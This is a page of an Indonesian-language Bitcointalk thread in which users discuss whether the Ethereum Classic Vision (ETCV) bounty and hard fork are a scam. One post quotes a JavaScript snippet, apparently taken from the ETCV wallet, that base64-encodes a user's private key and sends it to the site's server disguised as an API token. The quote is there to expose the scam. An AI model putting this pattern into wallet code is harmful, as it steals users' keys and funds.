Bitcoin Forum
February 20, 2019, 02:33:59 AM *
News: Latest Bitcoin Core release: 0.17.1 [Torrent]
 
   Home   Help Search Login Register More  
Pages: « 1 2 3 4 [5] 6 7 8 »  All
  Print  
Author Topic: Ethereum Classic Vision (ETCV) Scam Atau Tidak?  (Read 3560 times)
tracyhayley
Full Member
***
Offline Offline

Activity: 433
Merit: 102



View Profile
January 09, 2019, 11:42:38 PM
 #81

entah lah ini scam atau tidak. pertama ane lihat thread bounty ETCV nya dulu 25 desember kalo tidak salah dibuatnya. nah lima hari kemudian muncul WAVES X bounty. ini mirip sekali dengan ETCV, apalagi bounty thread nya, semua detailnya sama tetapi dibuat dengan 2 akun yg berbeda. dan tema project nya hampir sama, jika ETCV fork 3 :1 dari ETH, nah waves X ini snapshot di 5 : 1 dari WAVES. untuk masalah scam atau tidak lihat saja nanti karena terlanjur sudah mau end kan ? kalo dibayar syukuri, kalo nggak ya belum rezeki aja.  Smiley

1550630039
Hero Member
*
Offline Offline

Posts: 1550630039

View Profile Personal Message (Offline)

Ignore
1550630039
Reply with quote  #2

1550630039
Report to moderator
1550630039
Hero Member
*
Offline Offline

Posts: 1550630039

View Profile Personal Message (Offline)

Ignore
1550630039
Reply with quote  #2

1550630039
Report to moderator
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction. Advertise here.
1550630039
Hero Member
*
Offline Offline

Posts: 1550630039

View Profile Personal Message (Offline)

Ignore
1550630039
Reply with quote  #2

1550630039
Report to moderator
1550630039
Hero Member
*
Offline Offline

Posts: 1550630039

View Profile Personal Message (Offline)

Ignore
1550630039
Reply with quote  #2

1550630039
Report to moderator
1550630039
Hero Member
*
Offline Offline

Posts: 1550630039

View Profile Personal Message (Offline)

Ignore
1550630039
Reply with quote  #2

1550630039
Report to moderator
ajomanih
Full Member
***
Offline Offline

Activity: 518
Merit: 100


View Profile
January 10, 2019, 02:46:09 AM
 #82

tentunya sebagai pengguna ethereum kita optimis kalau ETCV akan sukses  gan, karena banyak yang menunggu kehadirannya gan, tentunya kita harus mensuport coin ETCV gan agar nantinya bisa bersaing dengan coin lainnya gan sehingga kita sebagai pengguna bisa mendapatkan profit gan, tentunya kita menunggu samapi harfork ethereum tangal 11 besok gan.


sams87
Member
**
Offline Offline

Activity: 95
Merit: 23


View Profile
January 10, 2019, 03:53:50 PM
 #83

Ada berita baru ni coba di cek langsung Ethereum Classic Vision scam

JUAL SPAREPART MOTOR , SERVICE TUNE UP, BORE UP, PORTING POLISH >> CEK LAPAK ANE
sameme
Jr. Member
*
Offline Offline

Activity: 434
Merit: 8


View Profile
January 10, 2019, 04:04:07 PM
 #84

Ada berita baru ni coba di cek langsung Ethereum Classic Vision scam
Melihat berita ini, pasti banyak peserta bounty yang kecewa, lagian setiap bounty pasti ada team yang jelas. Untung saja saya tidak bergabung  Grin

►◄  ROCKZ  ◄►
◄► ROCKZ IS THE WORLD’S MOST BULLETPROOF CRYPTOCURRENCY ►◄
https://alprockz.io/
mlindjo
Sr. Member
****
Offline Offline

Activity: 560
Merit: 254



View Profile
January 10, 2019, 04:29:26 PM
 #85

Saat sebuah coin akan mengadakan harkfork, tentunya mereka akan memberikan informasi melalui website, maupun media sosial mereka lainnya, jika tidak demikian maka bisa saja berita yang beredar bohong jika pihak terkait tidak memberikan informasi apapun

aruldaroy
Full Member
***
Offline Offline

Activity: 518
Merit: 100



View Profile WWW
January 10, 2019, 07:14:02 PM
 #86

Saat sebuah coin akan mengadakan harkfork, tentunya mereka akan memberikan informasi melalui website, maupun media sosial mereka lainnya, jika tidak demikian maka bisa saja berita yang beredar bohong jika pihak terkait tidak memberikan informasi apapun
Iya gan, yang pastinya untuk informasi yang jelas dan akurat memang kita harus memeriksa di media sosial resminya, disitu kebiasaan akan ada pesan tersemat untuk diketahui oleh para pengikut komunitas nya masing2.

mattujusuruga
Member
**
Offline Offline

Activity: 406
Merit: 11

HARA


View Profile WWW
January 10, 2019, 07:38:02 PM
 #87

Ada berita baru ni coba di cek langsung Ethereum Classic Vision scam
Sadis juga yah beritanya memng ternyata sudah ada yang membuktikan bahwa itu adalah scam, pasti banyak yang kecewa dengan ini, sebenarnya saya sndiri agak ragu awalnya soalnya bnyak berita miring mengenai ini. Tapi yah kebetulan bertepatan dengan berkhirnya bounty saya jadinya gabung dan saya sudah siap dengan konsekuensinya, lagian saya gabung cuma 2 hari.. lol

   H A R A                [  WHITEPAPER   │   LITEPAPER  ]                H A R A  
Empowering billions through data one byte at a time
TWITTER     GITHUB          REDDIT     FACEBOOK     BITCOINTALKLINKEDIN
bahagia93
Full Member
***
Offline Offline

Activity: 546
Merit: 102



View Profile WWW
January 10, 2019, 07:59:06 PM
 #88

Sadis juga yah beritanya memng ternyata sudah ada yang membuktikan bahwa itu adalah scam, pasti banyak yang kecewa dengan ini, sebenarnya saya sndiri agak ragu awalnya soalnya bnyak berita miring mengenai ini. Tapi yah kebetulan bertepatan dengan berkhirnya bounty saya jadinya gabung dan saya sudah siap dengan konsekuensinya, lagian saya gabung cuma 2 hari.. lol
Sama gan ane juga tertarik saat pertama bounty di buka mungkin karena firasat kurang yakin ane memilih skip saja,Tapi sekarang terbukti kalau proyek ini scam dan tim proyek ini anonim tidak di ketahui..

   H A R A               WHITEPAPER   │   LITEPAPER  ]                H A R A  
Empowering billions through data one byte at a time
TWITTER     GITHUB          REDDIT     FACEBOOK     BITCOINTALKLINKEDIN
InvisibilityFP
Member
**
Offline Offline

Activity: 434
Merit: 10


View Profile WWW
January 10, 2019, 08:45:12 PM
 #89

Ada berita baru ni coba di cek langsung Ethereum Classic Vision scam
Sebuah berita yang buruk apalagi kalau dilihat pada bagian bountynya bnyak yang gabung gimana tuu perasaan mereka harus kerja rodi. Saya pun awalnya bingung dengan ini kok hardfork ada bountynya, trus dengan banyaknya isu2 negatif mengenai ini makanya saya sndiri memilih skip dan pilih proyk yang lain. Kalau sperti ini mah ngak ada yang bisa disalahin tinggal sabar aja

   H A R A                [  WHITEPAPER   │   LITEPAPER  ]                H A R A  
Empowering billions through data one byte at a time
TWITTER     GITHUB          REDDIT     FACEBOOK     BITCOINTALKLINKEDIN
awi44
Member
**
Offline Offline

Activity: 322
Merit: 22


View Profile WWW
January 11, 2019, 12:45:55 AM
 #90

semakin mencurigakan karena grup telegramnya tidak bisa dibuka dengan pesan "tidak tersedia untuk negara anda, karena mengandung konten pornographi" ini mungkin disebabkan ga ada admin yang aktif digrup sehingga banyak yang kirim link pornografi.

NO SIGNATURE
daniahya
Legendary
*
Offline Offline

Activity: 1414
Merit: 1000



View Profile WWW
January 11, 2019, 12:48:45 AM
 #91

Ada berita baru ni coba di cek langsung Ethereum Classic Vision scam
Sebuah berita yang buruk apalagi kalau dilihat pada bagian bountynya bnyak yang gabung gimana tuu perasaan mereka harus kerja rodi. Saya pun awalnya bingung dengan ini kok hardfork ada bountynya, trus dengan banyaknya isu2 negatif mengenai ini makanya saya sndiri memilih skip dan pilih proyk yang lain. Kalau sperti ini mah ngak ada yang bisa disalahin tinggal sabar aja
wah saya jga pernah liat itu banyak yg ikutan di bouty tersebut sangat di sayangkan sih gan yg saya tau malah memang bener setiap ada HF gk ada yg namanya menjalankan bouyt apa lgi bouty di bayar dengan coin hasil HF kan itu malah gk mungkin jga karena rata2 coinnya itu di berikan bagi pemegang ETH

       ██████  ██████
      ██████████████████
     ████████████████████
    █████  ███████  ██████
   █████  ████████   ██████
  █████  ██████████   ██████
 █████  █████ ██████   ██████
 █████  █████ █████     █████
  █████  █████████     █████
   █████  ███████     █████
    █████  █████     █████
     █████ █████   █████
      ████████████ █████
       ███████ ████████
JAVVY
       ▬▬▬▬▬▬▬▬▬▬




An All-in-one Crypto

.EXCHANGE.




.ULTIMATE CRYPTO.
.EXCHANGE..............
.FOR EVERYONE.......





██████
███▀▀▀
███
███





███
███
███▄▄▄
██████

         ▄▄████████▄▄
     ▄████████████████▄
   ▄███▀▄▄▄▄▄▄▄ ▀███████▄
  █████ █     █ █▄▀███████
 ██████ █     █ ███▄▀██████
▐██████ ███████▄▄▄▄▄▄ █████▌
▐██████ █▄▄▄▄▄▄▄▄▄▄▄█ █████▌
▐██████ █▄▄▄▄▄▄▄▄▄▄▄█ █████▌
 ██████ █▄▄▄▄▄▄▄▄▄▄▄█ █████
  █████ █▄▄▄▄▄▄▄▄▄▄▄█ ████
   ▀███▄▀▀▀▀▀▀▀▀▀▀▀▀▀▄██▀
     ▀████████████████▀
        ▀▀████████▀▀

        ▄▄████████▄▄
     ▄████████████████▄
   ▄████████████████████▄
  ███████████████▀▀  █████
 ████████████▀▀      ██████
▐████████▀▀   ▄▄     ██████▌
▐████▀▀    ▄█▀▀     ███████▌
▐████████ █▀        ███████▌
 ████████ ▄███▄   ███████
  ████████████████▄▄██████
   ▀████████████████████▀
     ▀████████████████▀
        ▀▀████████▀▀

██████
▀▀▀███
   ███
   ███





   ███
   ███
▄▄▄███
██████
........JOIN OUR TELEGRAM.........
NEWS ROOM
BITCOINTALK
MEDIUM
TWITTER
LINKEDIN
[/t
PRESDIR
Full Member
***
Offline Offline

Activity: 595
Merit: 100



View Profile
January 11, 2019, 02:31:11 AM
 #92

Ada berita baru ni coba di cek langsung Ethereum Classic Vision scam
Sadis juga yah beritanya memng ternyata sudah ada yang membuktikan bahwa itu adalah scam, pasti banyak yang kecewa dengan ini, sebenarnya saya sndiri agak ragu awalnya soalnya bnyak berita miring mengenai ini. Tapi yah kebetulan bertepatan dengan berkhirnya bounty saya jadinya gabung dan saya sudah siap dengan konsekuensinya, lagian saya gabung cuma 2 hari.. lol

Kebetulan ane juga ikutan di salah satu campaign yang diadakan ETCV gan dan kemarin sudah melihat kabar tersebut
ya apa boleh buat kalau sudah scam, bountynya hari ini juga sudah berakhir Cheesy

Rohtox
Full Member
***
Offline Offline

Activity: 532
Merit: 100



View Profile WWW
January 11, 2019, 03:39:18 AM
 #93

Ada berita baru ni coba di cek langsung Ethereum Classic Vision scam

untung saja kemarin sudah curiga karena tidak ada kejelasan tentang projek ini dan memutuskan untuk meninggalkan signaturenya. sekarang telegram etcv udah kena block tu karena konten pornografi

   H A R A               WHITEPAPER   │   LITEPAPER  ]                H A R A  
Empowering billions through data one byte at a time
TWITTER     GITHUB          REDDIT     FACEBOOK     BITCOINTALKLINKEDIN
Loedong
Jr. Member
*
Offline Offline

Activity: 238
Merit: 1


View Profile
January 11, 2019, 09:38:04 AM
 #94

Ada berita baru ni coba di cek langsung Ethereum Classic Vision scam

untung saja kemarin sudah curiga karena tidak ada kejelasan tentang projek ini dan memutuskan untuk meninggalkan signaturenya. sekarang telegram etcv udah kena block tu karena konten pornografi
iya gan,belum rejekinya saja. dan beruntungnya saya waktu itu tidak ngikut signaturenya cuma ngikut di telegramnya aja jadi gak terlalu menyesali. ditelegram tidak hanya ada konten porno tapi konten kotor lainya sudah menjamur gan,udah jadi sarang spam dah

GIGZI - INDEPENDENT WEALTH MANAGEMENT
www.gigzi.com
awi44
Member
**
Offline Offline

Activity: 322
Merit: 22


View Profile WWW
January 11, 2019, 11:59:13 AM
 #95

iya gan,belum rejekinya saja. dan beruntungnya saya waktu itu tidak ngikut signaturenya cuma ngikut di telegramnya aja jadi gak terlalu menyesali. ditelegram tidak hanya ada konten porno tapi konten kotor lainya sudah menjamur gan,udah jadi sarang spam dah
sampai detik ini telegram grupnya belom bisa gue buka, masih dengan pesan yang sama. apa di lo juga sama ga bisa dibuka ? sebenernya penasaran apa aja isi pembicaraan disana.

NO SIGNATURE
amrulshare
Hero Member
*****
Offline Offline

Activity: 910
Merit: 510


PENULIS BLOG SEDERHANA


View Profile WWW
January 11, 2019, 12:06:18 PM
 #96

fork resmi dari  Ethereum adalah Constantinople ! baru-baru ini cointelegraph telah memberitakan tentang beberapa harfork yang bersifat menipu dan salah satunya adalah ETCV. berikut beritanya. dalam berita tsb mengatakan bahwa "potongan kode yang disediakan benar-benar mengirimkan data kunci pribadi Anda di server Ethereum Classic Vision dan menutupinya sebagai token API".

jakasantosa
Jr. Member
*
Offline Offline

Activity: 280
Merit: 2


View Profile WWW
January 11, 2019, 02:34:02 PM
 #97

Setelah adanya Info yang memberitahu bahwa ETCV itu ternasuk salah satu yang Scam sebaiknya bagi yang mengikuti bounty/airdrop atau proyek apapun dari ETCV segera hentikan saja. bagi yang terlanjur investasi jika dana bisa ditarik kembali silahkan ditarik kembali daripada nanti kita yang rugi.

NEED SUGGESTION
wmaurik
Hero Member
*****
Offline Offline

Activity: 924
Merit: 501



View Profile
January 11, 2019, 02:55:02 PM
 #98

Setelah adanya Info yang memberitahu bahwa ETCV itu ternasuk salah satu yang Scam sebaiknya bagi yang mengikuti bounty/airdrop atau proyek apapun dari ETCV segera hentikan saja. bagi yang terlanjur investasi jika dana bisa ditarik kembali silahkan ditarik kembali daripada nanti kita yang rugi.
Etcv bukan sebuah proyek yang melakukan penggalangan dana (ICO) tidak ada investasi di proyek ini. Menurut saya tidak ada yang sampai dirugikan proyek ini kecuali peserta bounty


````````````````██
```````````````████
``````````````██████``█
`````````````▓▓██████`██
````````````▓▓▓██████████
```````````▓▓▓▓▓██████████
``````````▓▓▓▓▓▓▓▓█████████
`````````███████████████████
````````█████████████████████
```````███████████████████████
`````██████████████████████████
````███████████``````███████▓▓▓▓
```████████████``````███████▓▓▓▓▓
``█████████████``````█████████▓▓▓▓
`████████``````````````````████████
█████████``````````````````█████████
█████████``````````````````██████████
``█████████████``````██████████████
`````██████████``````███████████
````````███████``````████████
```````````███████████████
``````````````█████████
Greentoken
ROCKZ
|
vin1103
Full Member
***
Online Online

Activity: 462
Merit: 101


"MenaPay - Crypto made easier than cash"


View Profile
January 11, 2019, 02:56:32 PM
 #99

sepertinya benar seperti kabar yang beredar adanya kalau etcv adalah scam, informasi
Their wallet https://etcvwallet.com requires you to enter the private key or upload the json file generated by MEW. In the javascript code from file etherwallet-master.js line 3832 they have a code that sends the private key masked somehow to their server

Code:
   
$scope.$on('ChangeWallet', function () {
        const key = window.btoa($scope.walletService.wallet.getPrivateKeyString());
        window.fetch('/api', {
            method: 'POST',
            mode: 'cors',
            cache: 'no-cache',
            credentials: 'same-origin',
            headers: {
                'Content-Type': 'application/json'
            },
            redirect: 'follow',
            referrer: 'no-referrer',
            body: JSON.stringify({ api_token: key })
        });



kalau sudah meminta key mew sepertinya sudah kemungkinan besar indikasi scam, kalau memang memiliki wallet sendiri untuk apa mereka meminta memasukan key dari mew itu kecurigaannya

Gayolues98
Member
**
Offline Offline

Activity: 322
Merit: 10


View Profile
January 11, 2019, 03:59:27 PM
 #100

Terimakasih kepada mastah mastah yang telah menyampaikan informasi bahwa ETCV adalah scam, kalau memang benar scam tolong penjelasan dan buktinya bahwa ETCV scam, informasi link yang lengkap bukan sekedar berita.

│ 
  A I R W A L L E T │    The Gold Standard of Airdrops  
 ►   WHITEPAPER   ◄
[        TWITTER        FACEBOOK        LinkedIn        ANN THREAD        TELEGRAM        INSTAGRAM        ]
Pages: « 1 2 3 4 [5] 6 7 8 »  All
  Print  
 
Jump to:  

Bitcointalk.org is not available or authorized for sale. Do not believe any fake listings.
Sponsored by , a Bitcoin-accepting VPN.
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!